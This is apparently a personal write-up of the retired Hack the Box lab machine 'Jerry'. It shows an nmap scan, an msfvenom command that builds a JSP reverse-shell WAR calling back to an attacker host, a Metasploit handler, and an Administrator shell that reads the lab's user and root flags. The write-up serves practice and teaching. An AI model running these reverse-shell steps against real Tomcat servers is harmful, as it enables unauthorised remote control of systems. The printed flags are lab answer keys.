Hack the Box
In 2018 I started to play with Hack the box. The principle is similar to the vulnhub machines: You got a VM and have to root it. The main difference is that you are connected to a VPN nd the machines are shared between the users. Also, there is only 20 "active" VM at a time. At the moment there is a total of 128 VM and therefore 108 retired. Finally, nobody is publishing Writeup before the VM is retired.
One of the Drawback is that I completely forgot to write and publish this writeup.
The Jerry machine is Windows server. This VM is classified as a trivial one. In fact it is a really easy one.
As usual, we start with a simple network scan using nmap in order to scan the open TCP ports: Only the port 8080 is open with an HTTP service.
root@kalili:~# nmap -p- 10.10.10.95 -sSVStarting Nmap 7.70 ( https://nmap.org ) at 2018-11-03 17:38 CET Nmap scan report for 10.10.10.95 Host is up (0.019s latency). Not shown: 65534 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds
When going to this page we see a simple Tomcat Application Manager.
Exploiting the administration interface
We generate a Java reverse shell payload using
root@kalili:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.14 LPORT=4444 -f war > reverse2.war
We start the handler using
msf exploit(multi/handler) > use exploit/multi/handlermsf exploit(multi/handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (java/jsp_shell_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 10.10.15.14 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port SHELL no The system shell to use. Exploit target: Id Name -- ---- 0 Wildcard Target
When running the War payload we got a shell as Administrator and we can start listing the directories looking for the flags:
C:\apache-tomcat-7.0.88>dir c:\Usersdir c:\Users Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of c:\Users 06/18/2018 10:31 PM <DIR> . 06/18/2018 10:31 PM <DIR> .. 06/18/2018 10:31 PM <DIR> Administrator 08/22/2013 05:39 PM <DIR> Public 0 File(s) 0 bytes 4 Dir(s) 27,600,285,696 bytes free C:\apache-tomcat-7.0.88>dir c:\Users\Administrator\Desktop\ dir c:\Users\Administrator\Desktop\ Volume in drive C has no label. Volume Serial Number is FC2B-E489 Directory of c:\Users\Administrator\Desktop 06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:09 AM <DIR> flags 0 File(s) 0 bytes 3 Dir(s) 27,600,269,312 bytes free C:\apache-tomcat-7.0.88>dir c:\Users\Administrator\Desktop\flags dir c:\Users\Administrator\Desktop\flags Volume in drive C has no label. Volume Serial Number is FC2B-E489
As we already are administrator we can read the flag for the two level:
Directory of c:\Users\Administrator\Desktop\flags06/19/2018 06:09 AM <DIR> . 06/19/2018 06:09 AM <DIR> .. 06/19/2018 06:11 AM 88 2 for the price of 1.txt 1 File(s) 88 bytes 2 Dir(s) 27,600,269,312 bytes free C:\apache-tomcat-7.0.88>type c:\Users\Administrator\Desktop\flags\2* type c:\Users\Administrator\Desktop\flags\2* user.txt 7004dbcef0f854e0fb401875f26ebd00 root.txt 04a8b36e1545a455393d067e772fe90e